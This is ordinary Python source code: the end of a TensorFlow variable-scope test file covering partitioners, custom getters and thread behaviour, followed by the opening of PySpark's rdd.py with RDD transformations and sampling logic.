"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
def testNoReuseInEagerByDefault(self):
with context.eager_mode():
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v1 = variable_scope.get_variable("name0", shape=(3, 1, 1))
v2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertIsNot(v1, v2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxisResource(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
def testPartitionConcatenatesAlongCorrectAxisResourceInEager(self):
with context.eager_mode():
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
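    # The getter ran for v, v2 and v4; v3 was created in new_scope, which has
    # no custom getter.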
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = variable_scope.VariableSynchronization.AUTO
aggregation = variable_scope.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
variable_scope.get_variable("v", [1])
self.assertEqual(1, called[0])
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
synchronization = variable_scope.VariableSynchronization.ON_READ
aggregation = variable_scope.VariableAggregation.MEAN
variable_scope.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'custom_getter/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("custom_getter/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
@test_util.run_deprecated_v1
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = self.evaluate([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'sum_getter_2/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("sum_getter_2/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
@test_util.run_deprecated_v1
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = self.evaluate([true_vars, v])
      # take sums of sums of products
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
    def creator_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
variable_scope.VariableAggregation.MEAN)
return next_creator(**kwargs)
    with variable_scope.variable_creator_scope(creator_c):
variable_scope.get_variable(
"v", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = ops.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = variable_scope.variable_creator_scope(creator)
scope.__enter__()
with variable_scope.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
class PartitionInfoTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
if __name__ == "__main__":
test.main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and for tuples that contain None.
    The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
    A bounded value generated by an approximate job, carrying a confidence
    level together with its low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
try:
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
    Ignore the 'u' prefix of strings in doc tests, so that they work
    in both Python 2 and 3.
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
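# Illustrative sketch (added for clarity; not part of the original source). It shows
# how a Partitioner maps keys to partition indices for a hypothetical 3-partition
# setup:
#
#   p = Partitioner(3, portable_hash)
#   p("spark") == portable_hash("spark") % 3   # deterministic bucket in [0, 3)
#   p("spark") == p("spark")                   # the same key always lands in the same partition
#
# Two Partitioner objects compare equal only when both the partition count and the
# partition function match, which is what lets keyed operations reuse an existing
# partitioning instead of shuffling again.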
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
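    # Worked example (added for illustration; not part of the original source):
    # requesting num=100 samples without replacement from total=10000 elements gives
    #   fraction = 100 / 10000 = 0.01
    #   gamma    = -log(0.00005) / 10000 ~= 0.00099
    #   q        = min(1, 0.01 + 0.00099 + sqrt(0.00099**2 + 2 * 0.00099 * 0.01)) ~= 0.0156
    # so roughly 1.6% of the data is sampled to get at least 100 rows back 99.99%
    # of the time.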
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
